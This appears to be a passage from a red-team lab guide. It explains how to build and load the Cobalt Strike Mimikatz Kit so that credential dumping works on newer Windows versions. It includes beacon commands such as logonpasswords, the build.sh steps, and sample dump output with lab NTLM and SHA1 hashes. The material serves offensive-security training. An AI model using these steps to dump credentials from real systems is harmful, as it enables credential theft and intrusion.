You may have noticed instances in the lab where you've tried to run commands such as sekurlsa::logonpasswords and sekurlsa::ekeys, only to receive the following error:
beacon> run hostname
web
beacon> getuid
[*] You are NT AUTHORITY\SYSTEM (admin)
beacon> logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
\
This is simply because the version of Mimikatz built into Cobalt Strike by default is not recent enough to work on later versions of Windows such as 11 and Server 2022. The Mimikatz Kit allows you to bring alternate builds of Mimikatz into CS to overcome this limitation.
Confusingly, CS is actually bundled with multiple flavours of Mimikatz in both x86 and x64 builds.
The "max" versions include the complete Mimikatz codebase, which can be used with CS 4.6 and above as the 1 MB limit can be removed. The "full" versions have some code stripped out to reduce the file size (although no official documentation seems to exists that explains exactly what is removed); and the "chrome" versions contains code pertinent to Beacon's chromedump command. Again, no documentation seems to exist that states which parts of the Mimikatz codebase this is, but I suspect it's at least dpapi::chrome.
ubuntu@DESKTOP-3BSK7NO /m/c/T/c/a/k/mimikatz> pwd
/mnt/c/Tools/cobaltstrike/arsenal-kit/kits/mimikatz
ubuntu@DESKTOP-3BSK7NO /m/c/T/c/a/k/mimikatz> ./build.sh /mnt/c/Tools/cobaltstrike/mimikatz
[Mimikatz kit] [+] Copying the mimikatz dlls
[Mimikatz kit] [+] Generate the mimikatz.cna from the template file.
[Mimikatz kit] [+] The Mimikatz files are saved in '/mnt/c/Tools/cobaltstrike/mimikatz'
\
Load mimikatz.cna via the Cobalt Strike > Script Manager menu and clicking the Load button. After loading the CNA, Mimikatz will now function as expected.
beacon> logonpasswords
Authentication Id : 0 ; 64753 (00000000:0000fcf1)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 1/15/2023 3:03:57 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WEB$
* Domain : DEV
* NTLM : 4b5aff0a96dfb6c6240340a6800e6f11
* SHA1 : bd13b64953a55abddf7b9c1bdcc043a9d88fd955
The DLLs are custom-built to include a Reflective DLL loader (based on original implementation) and modified code to achieve a smaller file size, which is required to work with Beacon's legacy 1 MB size limit.
The good news is that the CS dev team are making an effort to keep the version of Mimikatz inside the Mimikatz Kit up-to-date with . This means we can simply build the kit as-is and load it into CS. This is as simple as running build.sh and specifying an output directory.